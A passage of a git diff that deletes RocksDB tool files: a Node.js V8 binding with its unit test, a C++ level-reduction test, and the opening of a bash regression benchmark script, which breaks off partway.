-    if (!put_pair->Get(0)->IsString() || !put_pair->Get(1)->IsString()) {
-      return false;
-    }
-
-    batch.Put(
-        db_wrapper->columnFamilies_[cf],
-        *v8::String::Utf8Value(put_pair->Get(0)->ToString()),
-        *v8::String::Utf8Value(put_pair->Get(1)->ToString()));
-  }
-
-  return true;
-}
-
-Handle<Value> DBWrapper::WriteBatch(const Arguments& args) {
-  HandleScope scope;
-
-  if (!args[0]->IsArray()) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  DBWrapper* db_wrapper     = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  Handle<Array> sub_batches = Handle<Array>::Cast(args[0]);
-  Local<Object> sub_batch;
-  rocksdb::WriteBatch batch;
-  bool well_formed;
-
-  for (uint i = 0; i < sub_batches->Length(); i++) {
-    if (!sub_batches->Get(i)->IsObject()) {
-      return scope.Close(Boolean::New(false));
-    }
-    sub_batch = sub_batches->Get(i)->ToObject();
-
-    if (sub_batch->Has(String::NewSymbol("column_family"))) {
-      if (!has_key_for_array(sub_batch, "put") &&
-          !has_key_for_array(sub_batch, "delete")) {
-        return scope.Close(Boolean::New(false));
-      }
-
-      well_formed = db_wrapper->AddToBatch(
-        batch, false,
-        Handle<Array>::Cast(sub_batch->Get(String::NewSymbol("put"))),
-        db_wrapper, *v8::String::Utf8Value(sub_batch->Get(
-            String::NewSymbol("column_family"))));
-
-      well_formed = db_wrapper->AddToBatch(
-          batch, true,
-          Handle<Array>::Cast(sub_batch->Get(String::NewSymbol("delete"))),
-          db_wrapper, *v8::String::Utf8Value(sub_batch->Get(
-          String::NewSymbol("column_family"))));
-    } else {
-      well_formed = db_wrapper->AddToBatch(
-          batch, false,
-          Handle<Array>::Cast(sub_batch->Get(String::NewSymbol("put"))));
-      well_formed = db_wrapper->AddToBatch(
-          batch, true,
-          Handle<Array>::Cast(sub_batch->Get(String::NewSymbol("delete"))));
-
-      if (!well_formed) {
-        return scope.Close(Boolean::New(false));
-      }
-    }
-  }
-
-  db_wrapper->status_ = db_wrapper->db_->Write(rocksdb::WriteOptions(), &batch);
-
-  return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-}
-
-Handle<Value> DBWrapper::CompactRangeDefault(const Arguments& args) {
-  HandleScope scope;
-
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  rocksdb::Slice begin     = *v8::String::Utf8Value(args[0]->ToString());
-  rocksdb::Slice end       = *v8::String::Utf8Value(args[1]->ToString());
-  db_wrapper->status_    = db_wrapper->db_->CompactRange(&end, &begin);
-
-  return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-}
-
-Handle<Value> DBWrapper::CompactColumnFamily(const Arguments& args) {
-  HandleScope scope;
-
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  rocksdb::Slice begin  = *v8::String::Utf8Value(args[0]->ToString());
-  rocksdb::Slice end    = *v8::String::Utf8Value(args[1]->ToString());
-  std::string cf        = *v8::String::Utf8Value(args[2]->ToString());
-  db_wrapper->status_    = db_wrapper->db_->CompactRange(
-      db_wrapper->columnFamilies_[cf], &begin, &end);
-
-  return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-}
-
-Handle<Value> DBWrapper::CompactOptions(const Arguments& args) {
-  HandleScope scope;
-
-  if (!args[2]->IsObject()) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  rocksdb::Slice begin     = *v8::String::Utf8Value(args[0]->ToString());
-  rocksdb::Slice end       = *v8::String::Utf8Value(args[1]->ToString());
-  Local<Object> options  = args[2]->ToObject();
-  int target_level = -1, target_path_id = 0;
-
-  if (options->Has(String::NewSymbol("target_level")) &&
-      options->Get(String::NewSymbol("target_level"))->IsInt32()) {
-    target_level = (int)(options->Get(
-        String::NewSymbol("target_level"))->ToInt32()->Value());
-
-    if (options->Has(String::NewSymbol("target_path_id")) ||
-        options->Get(String::NewSymbol("target_path_id"))->IsInt32()) {
-      target_path_id = (int)(options->Get(
-          String::NewSymbol("target_path_id"))->ToInt32()->Value());
-    }
-  }
-
-  db_wrapper->status_ = db_wrapper->db_->CompactRange(
-    &begin, &end, true, target_level, target_path_id
-  );
-
-  return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-}
-
-Handle<Value> DBWrapper::CompactAll(const Arguments& args) {
-  HandleScope scope;
-
-  if (!args[2]->IsObject() || !args[3]->IsString()) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  rocksdb::Slice begin  = *v8::String::Utf8Value(args[0]->ToString());
-  rocksdb::Slice end    = *v8::String::Utf8Value(args[1]->ToString());
-  Local<Object> options = args[2]->ToObject();
-  std::string cf        = *v8::String::Utf8Value(args[3]->ToString());
-
-  int target_level = -1, target_path_id = 0;
-
-  if (options->Has(String::NewSymbol("target_level")) &&
-      options->Get(String::NewSymbol("target_level"))->IsInt32()) {
-    target_level = (int)(options->Get(
-        String::NewSymbol("target_level"))->ToInt32()->Value());
-
-    if (options->Has(String::NewSymbol("target_path_id")) ||
-        options->Get(String::NewSymbol("target_path_id"))->IsInt32()) {
-      target_path_id = (int)(options->Get(
-          String::NewSymbol("target_path_id"))->ToInt32()->Value());
-    }
-  }
-
-  db_wrapper->status_ = db_wrapper->db_->CompactRange(
-    db_wrapper->columnFamilies_[cf], &begin, &end, true, target_level,
-    target_path_id);
-
-  return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-}
-
-Handle<Value> DBWrapper::CompactRange(const Arguments& args) {
-  HandleScope scope;
-
-  if (!args[0]->IsString() || !args[1]->IsString()) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  switch(args.Length()) {
-  case 2:
-    return CompactRangeDefault(args);
-  case 3:
-    return args[2]->IsString() ? CompactColumnFamily(args) :
-        CompactOptions(args);
-  default:
-    return CompactAll(args);
-  }
-}
-
-Handle<Value> DBWrapper::Close(const Arguments& args) {
-  HandleScope scope;
-
-  delete ObjectWrap::Unwrap<DBWrapper>(args.This());
-
-  return scope.Close(Null());
-}
diff --git a/thirdparty/rocksdb/tools/rdb/db_wrapper.h b/thirdparty/rocksdb/tools/rdb/db_wrapper.h
deleted file mode 100644
index 9d1c8f8..0000000
--- a/thirdparty/rocksdb/tools/rdb/db_wrapper.h
+++ /dev/null
@@ -1,58 +0,0 @@
-#ifndef DBWRAPPER_H
-#define DBWRAPPER_H
-
-#include <map>
-#include <node.h>
-
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/options.h"
-
-using namespace v8;
-
-// Used to encapsulate a particular instance of an opened database.
-//
-// This object should not be used directly in C++; it exists solely to provide
-// a mapping from a JavaScript object to a C++ code that can use the RocksDB
-// API.
-class DBWrapper : public node::ObjectWrap {
-  public:
-    static void Init(Handle<Object> exports);
-
-  private:
-    explicit DBWrapper();
-    ~DBWrapper();
-
-    // Helper methods
-    static bool HasFamilyNamed(std::string& name, DBWrapper* db);
-    static bool AddToBatch(rocksdb::WriteBatch& batch, bool del,
-        Handle<Array> array);
-    static bool AddToBatch(rocksdb::WriteBatch& batch, bool del,
-        Handle<Array> array, DBWrapper* db_wrapper, std::string cf);
-    static Handle<Value> CompactRangeDefault(const v8::Arguments& args);
-    static Handle<Value> CompactColumnFamily(const Arguments& args);
-    static Handle<Value> CompactOptions(const Arguments& args);
-    static Handle<Value> CompactAll(const Arguments& args);
-
-    // C++ mappings of API methods
-    static Persistent<v8::Function> constructor;
-    static Handle<Value> Open(const Arguments& args);
-    static Handle<Value> New(const Arguments& args);
-    static Handle<Value> Get(const Arguments& args);
-    static Handle<Value> Put(const Arguments& args);
-    static Handle<Value> Delete(const Arguments& args);
-    static Handle<Value> Dump(const Arguments& args);
-    static Handle<Value> WriteBatch(const Arguments& args);
-    static Handle<Value> CreateColumnFamily(const Arguments& args);
-    static Handle<Value> CompactRange(const Arguments& args);
-    static Handle<Value> Close(const Arguments& args);
-
-    // Internal fields
-    rocksdb::Options options_;
-    rocksdb::Status status_;
-    rocksdb::DB* db_;
-    std::unordered_map<std::string, rocksdb::ColumnFamilyHandle*>
-        columnFamilies_;
-};
-
-#endif
diff --git a/thirdparty/rocksdb/tools/rdb/rdb b/thirdparty/rocksdb/tools/rdb/rdb
deleted file mode 100755
index 05da115..0000000
--- a/thirdparty/rocksdb/tools/rdb/rdb
+++ /dev/null
@@ -1,3 +0,0 @@
-#!/usr/bin/env bash
-
-node -e "RDB = require('./build/Release/rdb').DBWrapper; console.log('Loaded rocksdb in variable RDB'); repl = require('repl').start('> ');"
diff --git a/thirdparty/rocksdb/tools/rdb/rdb.cc b/thirdparty/rocksdb/tools/rdb/rdb.cc
deleted file mode 100644
index 3619dc7..0000000
--- a/thirdparty/rocksdb/tools/rdb/rdb.cc
+++ /dev/null
@@ -1,15 +0,0 @@
-#ifndef BUILDING_NODE_EXTENSION
-#define BUILDING_NODE_EXTENSION
-#endif
-
-#include <node.h>
-#include <v8.h>
-#include "db/_wrapper.h"
-
-using namespace v8;
-
-void InitAll(Handle<Object> exports) {
-  DBWrapper::Init(exports);
-}
-
-NODE_MODULE(rdb, InitAll)
diff --git a/thirdparty/rocksdb/tools/rdb/unit_test.js b/thirdparty/rocksdb/tools/rdb/unit_test.js
deleted file mode 100644
index d74ee8c..0000000
--- a/thirdparty/rocksdb/tools/rdb/unit_test.js
+++ /dev/null
@@ -1,124 +0,0 @@
-assert = require('assert')
-RDB    = require('./build/Release/rdb').DBWrapper
-exec   = require('child_process').exec
-util   = require('util')
-
-DB_NAME = '/tmp/rocksdbtest-' + process.getuid()
-
-a = RDB()
-assert.equal(a.open(DB_NAME, ['b']), false)
-
-exec(
-    util.format(
-        "node -e \"RDB = require('./build/Release/rdb').DBWrapper; \
-        a = RDB('%s'); a.createColumnFamily('b')\"",
-        DB_NAME
-    ).exitCode, null
-)
-
-
-exec(
-    util.format(
-        "node -e \"RDB = require('./build/Release/rdb').DBWrapper; \
-        a = RDB('%s', ['b'])\"",
-        DB_NAME
-    ).exitCode, null
-)
-
-exec('rm -rf ' + DB_NAME)
-
-a = RDB()
-assert.equal(a.open(DB_NAME, ['a']), false)
-assert(a.open(DB_NAME), true)
-assert(a.createColumnFamily('temp'))
-
-b = RDB()
-assert.equal(b.open(DB_NAME), false)
-
-exec('rm -rf ' + DB_NAME)
-
-DB_NAME += 'b'
-
-a = RDB()
-assert(a.open(DB_NAME))
-assert.equal(a.constructor.name, 'DBWrapper')
-assert.equal(a.createColumnFamily(), false)
-assert.equal(a.createColumnFamily(1), false)
-assert.equal(a.createColumnFamily(['']), false)
-assert(a.createColumnFamily('b'))
-assert.equal(a.createColumnFamily('b'), false)
-
-// Get and Put
-assert.equal(a.get(1), null)
-assert.equal(a.get(['a']), null)
-assert.equal(a.get('a', 1), null)
-assert.equal(a.get(1, 'a'), null)
-assert.equal(a.get(1, 1), null)
-
-assert.equal(a.put(1), false)
-assert.equal(a.put(['a']), false)
-assert.equal(a.put('a', 1), false)
-assert.equal(a.put(1, 'a'), false)
-assert.equal(a.put(1, 1), false)
-assert.equal(a.put('a', 'a', 1), false)
-assert.equal(a.put('a', 1, 'a'), false)
-assert.equal(a.put(1, 'a', 'a'), false)
-assert.equal(a.put('a', 1, 1), false)
-assert.equal(a.put(1, 'a', 1), false)
-assert.equal(a.put(1, 1, 'a'), false)
-assert.equal(a.put(1, 1, 1), false)
-
-
-assert.equal(a.get(), null)
-assert.equal(a.get('a'), null)
-assert.equal(a.get('a', 'c'), null)
-assert.equal(a.put(), false)
-assert.equal(a.put('a'), false)
-assert.equal(a.get('a', 'b', 'c'), null)
-
-assert(a.put('a', 'axe'))
-assert(a.put('a', 'first'))
-assert.equal(a.get('a'), 'first')
-assert.equal(a.get('a', 'b'), null)
-assert.equal(a.get('a', 'c'), null)
-
-assert(a.put('a', 'apple', 'b'))
-assert.equal(a.get('a', 'b'), 'apple')
-assert.equal(a.get('a'), 'first')
-assert(a.put('b', 'butter', 'b'), 'butter')
-assert(a.put('b', 'banana', 'b'))
-assert.equal(a.get('b', 'b'), 'banana')
-assert.equal(a.get('b'), null)
-assert.equal(a.get('b', 'c'), null)
-
-// Delete
-assert.equal(a.delete(1), false)
-assert.equal(a.delete('a', 1), false)
-assert.equal(a.delete(1, 'a'), false)
-assert.equal(a.delete(1, 1), false)
-
-assert.equal(a.delete('b'), true)
-assert(a.delete('a'))
-assert.equal(a.get('a'), null)
-assert.equal(a.get('a', 'b'), 'apple')
-assert.equal(a.delete('c', 'c'), false)
-assert.equal(a.delete('c', 'b'), true)
-assert(a.delete('b', 'b'))
-assert.equal(a.get('b', 'b'), null)
-
-// Dump
-console.log("MARKER 1")
-assert(a.dump())
-console.log("Should be no output between 'MARKER 1' and here\n")
-console.log('Next line should be "a" => "apple"')
-assert(a.dump('b'))
-
-console.log("\nMARKER 2")
-assert.equal(a.dump('c'), false)
-console.log("Should be no output between 'MARKER 2' and here\n")
-
-// WriteBatch
-
-
-// Clean up test database
-exec('rm -rf ' + DB_NAME)
diff --git a/thirdparty/rocksdb/tools/reduce_levels_test.cc b/thirdparty/rocksdb/tools/reduce_levels_test.cc
deleted file mode 100644
index 7fe38bf..0000000
--- a/thirdparty/rocksdb/tools/reduce_levels_test.cc
+++ /dev/null
@@ -1,218 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-
-#include "db/db_impl.h"
-#include "db/version_set.h"
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/ldb_cmd.h"
-#include "tools/ldb_cmd_impl.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class ReduceLevelTest : public testing::Test {
-public:
-  ReduceLevelTest() {
-    dbname_ = test::TmpDir() + "/db_reduce_levels_test";
-    DestroyDB(dbname_, Options());
-    db_ = nullptr;
-  }
-
-  Status OpenDB(bool create_if_missing, int levels);
-
-  Status Put(const std::string& k, const std::string& v) {
-    return db_->Put(WriteOptions(), k, v);
-  }
-
-  std::string Get(const std::string& k) {
-    ReadOptions options;
-    std::string result;
-    Status s = db_->Get(options, k, &result);
-    if (s.IsNotFound()) {
-      result = "NOT_FOUND";
-    } else if (!s.ok()) {
-      result = s.ToString();
-    }
-    return result;
-  }
-
-  Status Flush() {
-    if (db_ == nullptr) {
-      return Status::InvalidArgument("DB not opened.");
-    }
-    DBImpl* db_impl = reinterpret_cast<DBImpl*>(db_);
-    return db_impl->TEST_FlushMemTable();
-  }
-
-  void MoveL0FileToLevel(int level) {
-    DBImpl* db_impl = reinterpret_cast<DBImpl*>(db_);
-    for (int i = 0; i < level; ++i) {
-      ASSERT_OK(db_impl->TEST_CompactRange(i, nullptr, nullptr));
-    }
-  }
-
-  void CloseDB() {
-    if (db_ != nullptr) {
-      delete db_;
-      db_ = nullptr;
-    }
-  }
-
-  bool ReduceLevels(int target_level);
-
-  int FilesOnLevel(int level) {
-    std::string property;
-    EXPECT_TRUE(db_->GetProperty(
-        "rocksdb.num-files-at-level" + NumberToString(level), &property));
-    return atoi(property.c_str());
-  }
-
-private:
-  std::string dbname_;
-  DB* db_;
-};
-
-Status ReduceLevelTest::OpenDB(bool create_if_missing, int num_levels) {
-  rocksdb::Options opt;
-  opt.num_levels = num_levels;
-  opt.create_if_missing = create_if_missing;
-  rocksdb::Status st = rocksdb::DB::Open(opt, dbname_, &db_);
-  if (!st.ok()) {
-    fprintf(stderr, "Can't open the db:%s\n", st.ToString().c_str());
-  }
-  return st;
-}
-
-bool ReduceLevelTest::ReduceLevels(int target_level) {
-  std::vector<std::string> args = rocksdb::ReduceDBLevelsCommand::PrepareArgs(
-      dbname_, target_level, false);
-  LDBCommand* level_reducer = LDBCommand::InitFromCmdLineArgs(
-      args, Options(), LDBOptions(), nullptr, LDBCommand::SelectCommand);
-  level_reducer->Run();
-  bool is_succeed = level_reducer->GetExecuteState().IsSucceed();
-  delete level_reducer;
-  return is_succeed;
-}
-
-TEST_F(ReduceLevelTest, Last_Level) {
-  ASSERT_OK(OpenDB(true, 4));
-  ASSERT_OK(Put("aaaa", "11111"));
-  Flush();
-  MoveL0FileToLevel(3);
-  ASSERT_EQ(FilesOnLevel(3), 1);
-  CloseDB();
-
-  ASSERT_TRUE(ReduceLevels(3));
-  ASSERT_OK(OpenDB(true, 3));
-  ASSERT_EQ(FilesOnLevel(2), 1);
-  CloseDB();
-
-  ASSERT_TRUE(ReduceLevels(2));
-  ASSERT_OK(OpenDB(true, 2));
-  ASSERT_EQ(FilesOnLevel(1), 1);
-  CloseDB();
-}
-
-TEST_F(ReduceLevelTest, Top_Level) {
-  ASSERT_OK(OpenDB(true, 5));
-  ASSERT_OK(Put("aaaa", "11111"));
-  Flush();
-  ASSERT_EQ(FilesOnLevel(0), 1);
-  CloseDB();
-
-  ASSERT_TRUE(ReduceLevels(4));
-  ASSERT_OK(OpenDB(true, 4));
-  CloseDB();
-
-  ASSERT_TRUE(ReduceLevels(3));
-  ASSERT_OK(OpenDB(true, 3));
-  CloseDB();
-
-  ASSERT_TRUE(ReduceLevels(2));
-  ASSERT_OK(OpenDB(true, 2));
-  CloseDB();
-}
-
-TEST_F(ReduceLevelTest, All_Levels) {
-  ASSERT_OK(OpenDB(true, 5));
-  ASSERT_OK(Put("a", "a11111"));
-  ASSERT_OK(Flush());
-  MoveL0FileToLevel(4);
-  ASSERT_EQ(FilesOnLevel(4), 1);
-  CloseDB();
-
-  ASSERT_OK(OpenDB(true, 5));
-  ASSERT_OK(Put("b", "b11111"));
-  ASSERT_OK(Flush());
-  MoveL0FileToLevel(3);
-  ASSERT_EQ(FilesOnLevel(3), 1);
-  ASSERT_EQ(FilesOnLevel(4), 1);
-  CloseDB();
-
-  ASSERT_OK(OpenDB(true, 5));
-  ASSERT_OK(Put("c", "c11111"));
-  ASSERT_OK(Flush());
-  MoveL0FileToLevel(2);
-  ASSERT_EQ(FilesOnLevel(2), 1);
-  ASSERT_EQ(FilesOnLevel(3), 1);
-  ASSERT_EQ(FilesOnLevel(4), 1);
-  CloseDB();
-
-  ASSERT_OK(OpenDB(true, 5));
-  ASSERT_OK(Put("d", "d11111"));
-  ASSERT_OK(Flush());
-  MoveL0FileToLevel(1);
-  ASSERT_EQ(FilesOnLevel(1), 1);
-  ASSERT_EQ(FilesOnLevel(2), 1);
-  ASSERT_EQ(FilesOnLevel(3), 1);
-  ASSERT_EQ(FilesOnLevel(4), 1);
-  CloseDB();
-
-  ASSERT_TRUE(ReduceLevels(4));
-  ASSERT_OK(OpenDB(true, 4));
-  ASSERT_EQ("a11111", Get("a"));
-  ASSERT_EQ("b11111", Get("b"));
-  ASSERT_EQ("c11111", Get("c"));
-  ASSERT_EQ("d11111", Get("d"));
-  CloseDB();
-
-  ASSERT_TRUE(ReduceLevels(3));
-  ASSERT_OK(OpenDB(true, 3));
-  ASSERT_EQ("a11111", Get("a"));
-  ASSERT_EQ("b11111", Get("b"));
-  ASSERT_EQ("c11111", Get("c"));
-  ASSERT_EQ("d11111", Get("d"));
-  CloseDB();
-
-  ASSERT_TRUE(ReduceLevels(2));
-  ASSERT_OK(OpenDB(true, 2));
-  ASSERT_EQ("a11111", Get("a"));
-  ASSERT_EQ("b11111", Get("b"));
-  ASSERT_EQ("c11111", Get("c"));
-  ASSERT_EQ("d11111", Get("d"));
-  CloseDB();
-}
-
-}
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as LDBCommand is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/regression_test.sh b/thirdparty/rocksdb/tools/regression_test.sh
deleted file mode 100755
index 58558bb..0000000
--- a/thirdparty/rocksdb/tools/regression_test.sh
+++ /dev/null
@@ -1,460 +0,0 @@
-#!/usr/bin/env bash
-# The RocksDB regression test script.
-# REQUIREMENT: must be able to run make db_bench in the current directory
-#
-# This script will do the following things in order:
-#
-# 1. check out the specified rocksdb commit.
-# 2. build db_bench using the specified commit
-# 3. setup test directory $TEST_PATH.  If not specified, then the test directory
-#    will be "/tmp/rocksdb/regression_test"
-# 4. run set of benchmarks on the specified host
-#    (can be either locally or remotely)
-# 5. generate report in the $RESULT_PATH.  If RESULT_PATH is not specified,
-#    RESULT_PATH will be set to $TEST_PATH/current_time
-#
-# = Examples =
-# * Run the regression test using rocksdb commit abcdef that outputs results
-#   and temp files in "/my/output/dir"
-#r
-#   TEST_PATH=/my/output/dir COMMIT_ID=abcdef ./tools/regression_test.sh
-#
-# * Run the regression test on a remost host under "/my/output/dir" directory
-#   and stores the result locally in "/my/benchmark/results" using commit
-#   abcdef and with the rocksdb options specified in /my/path/to/OPTIONS-012345
-#   with 1000000000 keys in each benchmark in the regression test where each
-#   key and value are 100 and 900 bytes respectively:
-#
-#   REMOTE_USER_AT_HOST=yhchiang@my.remote.host \
-#       TEST_PATH=/my/output/dir \
-#       RESULT_PATH=/my/benchmark/results \
-#       COMMIT_ID=abcdef \
-#       OPTIONS_FILE=/my/path/to/OPTIONS-012345 \
-#       NUM_KEYS=1000000000 \
-#       KEY_SIZE=100 \
-#       VALUE_SIZE=900 \
-#       ./tools/regression_test.sh
-#
-# = Regression test environmental parameters =
-#   DEBUG: If true, then the script will not checkout master and build db_bench
-#       if db_bench already exists
-#       Default: 0
-#   TEST_MODE: If 1, run fillseqdeterminstic and benchmarks both
-#       if 0, only run fillseqdeterministc
-#       if 2, only run benchmarks
-#       Default: 1
-#   TEST_PATH: the root directory of the regression test.
-#       Default: "/tmp/rocksdb/regression_test"
-#   RESULT_PATH: the directory where the regression results will be generated.
-#       Default: "$TEST_PATH/current_time"
-#   REMOTE_USER_AT_HOST: If set, then test will run on the specified host under
-#       TEST_PATH directory and outputs test results locally in RESULT_PATH
-#       The REMOTE_USER_AT_HOST should follow the format user-id@host.name
-#   DB_PATH: the path where the rocksdb database will be created during the
-#       regression test.  Default:  $TEST_PATH/db
-#   WAL_PATH: the path where the rocksdb WAL will be outputed.
-#       Default:  $TEST_PATH/wal
-#   OPTIONS_FILE:  If specified, then the regression test will use the specified
-#       file to initialize the RocksDB options in its benchmarks.  Note that
-#       this feature only work for commits after 88acd93 or rocksdb version
-#       later than 4.9.
-#   DELETE_TEST_PATH: If true, then the test directory will be deleted
-#       after the script ends.
-#       Default: 0
-#
-# = db_bench parameters =
-#   NUM_THREADS:  The number of concurrent foreground threads that will issue
-#       database operations in the benchmark.  Default: 16.
-#   NUM_KEYS:  The key range that will be used in the entire regression test.
-#       Default: 1G.
-#   NUM_OPS:  The number of operations (reads, writes, or deletes) that will
-#       be issued in EACH thread.
-#       Default: $NUM_KEYS / $NUM_THREADS
-#   KEY_SIZE:  The size of each key in bytes in db_bench.  Default: 100.
-#   VALUE_SIZE:  The size of each value in bytes in db_bench.  Default: 900.
-#   CACHE_SIZE:  The size of RocksDB block cache used in db_bench.  Default: 1G
-#   STATISTICS:  If 1, then statistics is on in db_bench.  Default: 0.
-#   COMPRESSION_RATIO:  The compression ratio of the key generated in db_bench.
-#       Default: 0.5.
-#   HISTOGRAM:  If 1, then the histogram feature on performance feature is on.
-#   STATS_PER_INTERVAL:  If 1, then the statistics will be reported for every
-#       STATS_INTERVAL_SECONDS seconds.  Default 1.
-#   STATS_INTERVAL_SECONDS:  If STATS_PER_INTERVAL is set to 1, then statistics
-#       will be reported for every STATS_INTERVAL_SECONDS.  Default 60.
-#   MAX_BACKGROUND_FLUSHES:  The maxinum number of concurrent flushes in
-#       db_bench.  Default: 4.
-#   MAX_BACKGROUND_COMPACTIONS:  The maximum number of concurrent compactions
-#       in db_bench.  Default: 16.
-#   SEEK_NEXTS:  Controls how many Next() will be called after seek.
-#       Default: 10.
-#   SEED:  random seed that controls the randomness of the benchmark.
-#       Default: $( date +%s )
-
-#==============================================================================
-#  CONSTANT
-#==============================================================================
-TITLE_FORMAT="%40s,%25s,%30s,%7s,%9s,%8s,"
-TITLE_FORMAT+="%10s,%13s,%14s,%11s,%12s,"
-TITLE_FORMAT+="%7s,%11s,"
-TITLE_FORMAT+="%9s,%10s,%10s,%10s,%10s,%10s,%5s,"
-TITLE_FORMAT+="%5s,%5s,%5s" # time
-TITLE_FORMAT+="\n"
-
-DATA_FORMAT="%40s,%25s,%30s,%7s,%9s,%8s,"
-DATA_FORMAT+="%10s,%13.0f,%14s,%11s,%12s,"
-DATA_FORMAT+="%7s,%11s,"
-DATA_FORMAT+="%9.0f,%10.0f,%10.0f,%10.0f,%10.0f,%10.0f,%5.0f,"
-DATA_FORMAT+="%5.0f,%5.0f,%5.0f" # time
-DATA_FORMAT+="\n"
-
-MAIN_PATTERN="$1""[[:blank:]]+:.*[[:blank:]]+([0-9\.]+)[[:blank:]]+ops/sec"
-PERC_PATTERN="Percentiles: P50: ([0-9\.]+) P75: ([0-9\.]+) "
-PERC_PATTERN+="P99: ([0-9\.]+) P99.9: ([0-9\.]+) P99.99: ([0-9\.]+)"
-#==============================================================================
-
-function main {
-  TEST_ROOT_DIR=${TEST_PATH:-"/tmp/rocksdb/regression_test"}
-  init_arguments $TEST_ROOT_DIR
-
-  build_db_bench_and_ldb
-
-  setup_test_directory
-  if [ $TEST_MODE -le 1 ]; then
-      tmp=$DB_PATH
-      DB_PATH=$ORIGIN_PATH
-      test_remote "test -d $DB_PATH"
-      if [[ $? -ne 0 ]]; then
-          echo "Building DB..."
-          # compactall alone will not print ops or threads, which will fail update_report
-          run_db_bench "fillseq,compactall" $NUM_KEYS 1 0 0
-      fi
-      DB_PATH=$tmp
-  fi
-  if [ $TEST_MODE -ge 1 ]; then
-      build_checkpoint
-      run_db_bench "readrandom"
-      run_db_bench "readwhilewriting"
-      run_db_bench "deleterandom" $((NUM_KEYS / 10 / $NUM_THREADS))
-      run_db_bench "seekrandom"
-      run_db_bench "seekrandomwhilewriting"
-  fi
-
-  cleanup_test_directory $TEST_ROOT_DIR
-  echo ""
-  echo "Benchmark completed!  Results are available in $RESULT_PATH"
-}
-
-############################################################################
-function init_arguments {
-  K=1024
-  M=$((1024 * K))
-  G=$((1024 * M))
-
-  current_time=$(date +"%F-%H:%M:%S")
-  RESULT_PATH=${RESULT_PATH:-"$1/results/$current_time"}
-  COMMIT_ID=`git log | head -n1 | cut -c 8-`
-  SUMMARY_FILE="$RESULT_PATH/SUMMARY.csv"
-
-  DB_PATH=${3:-"$1/db"}
-  ORIGIN_PATH=${ORIGIN_PATH:-"$(dirname $(dirname $DB_PATH))/db"}
-  WAL_PATH=${4:-""}
-  if [ -z "$REMOTE_USER_AT_HOST" ]; then
-    DB_BENCH_DIR=${5:-"."}
-  else
-    DB_BENCH_DIR=${5:-"$1/db_bench"}
-  fi
-
-  DEBUG=${DEBUG:-0}
-  TEST_MODE=${TEST_MODE:-1}
-  SCP=${SCP:-"scp"}
-  SSH=${SSH:-"ssh"}
-  NUM_THREADS=${NUM_THREADS:-16}
-  NUM_KEYS=${NUM_KEYS:-$((1 * G))}  # key range
-  NUM_OPS=${NUM_OPS:-$(($NUM_KEYS / $NUM_THREADS))}
-  KEY_SIZE=${KEY_SIZE:-100}
-  VALUE_SIZE=${VALUE_SIZE:-900}
-  CACHE_SIZE=${CACHE_SIZE:-$((1 * G))}
-  STATISTICS=${STATISTICS:-0}
-  COMPRESSION_RATIO=${COMPRESSION_RATIO:-0.5}
-  HISTOGRAM=${HISTOGRAM:-1}
-  NUM_MULTI_DB=${NUM_MULTI_DB:-1}
-  STATS_PER_INTERVAL=${STATS_PER_INTERVAL:-1}
-  STATS_INTERVAL_SECONDS=${STATS_INTERVAL_SECONDS:-600}
-  MAX_BACKGROUND_FLUSHES=${MAX_BACKGROUND_FLUSHES:-4}
-  MAX_BACKGROUND_COMPACTIONS=${MAX_BACKGROUND_COMPACTIONS:-16}
-  DELETE_TEST_PATH=${DELETE_TEST_PATH:-0}
-  SEEK_NEXTS=${SEEK_NEXTS:-10}
-  SEED=${SEED:-$( date +%s )}
-}
-
-# $1 --- benchmark name
-# $2 --- number of operations.  Default: $NUM_KEYS
-# $3 --- number of threads.  Default $NUM_THREADS
-# $4 --- use_existing_db.  Default: 1
-# $5 --- update_report. Default: 1
-function run_db_bench {
-  # this will terminate all currently-running db_bench
-  find_db_bench_cmd="ps aux | grep db_bench | grep -v grep | grep -v aux | awk '{print \$2}'"
-
-  ops=${2:-$NUM_OPS}
-  threads=${3:-$NUM_THREADS}
-  USE_EXISTING_DB=${4:-1}
-  UPDATE_REPORT=${5:-1}
-  echo ""
-  echo "======================================================================="
-  echo "Benchmark $1"
-  echo "======================================================================="
-  echo ""
-  db_bench_error=0
-  options_file_arg=$(setup_options_file)
-  echo "$options_file_arg"
-  # use `which time` to avoid using bash's internal time command
-  db_bench_cmd="("'\$(which time)'" -p $DB_BENCH_DIR/db_bench \
-      --benchmarks=$1 --db=$DB_PATH --wal_dir=$WAL_PATH \
-      --use_existing_db=$USE_EXISTING_DB \
-      --disable_auto_compactions \
-      --threads=$threads \
-      --num=$NUM_KEYS \
-      --reads=$ops \
-      --writes=$ops \
-      --deletes=$ops \
-      --key_size=$KEY_SIZE \
-      --value_size=$VALUE_SIZE \
-      --cache_size=$CACHE_SIZE \
-      --statistics=$STATISTICS \
-      $options_file_arg \
-      --compression_ratio=$COMPRESSION_RATIO \
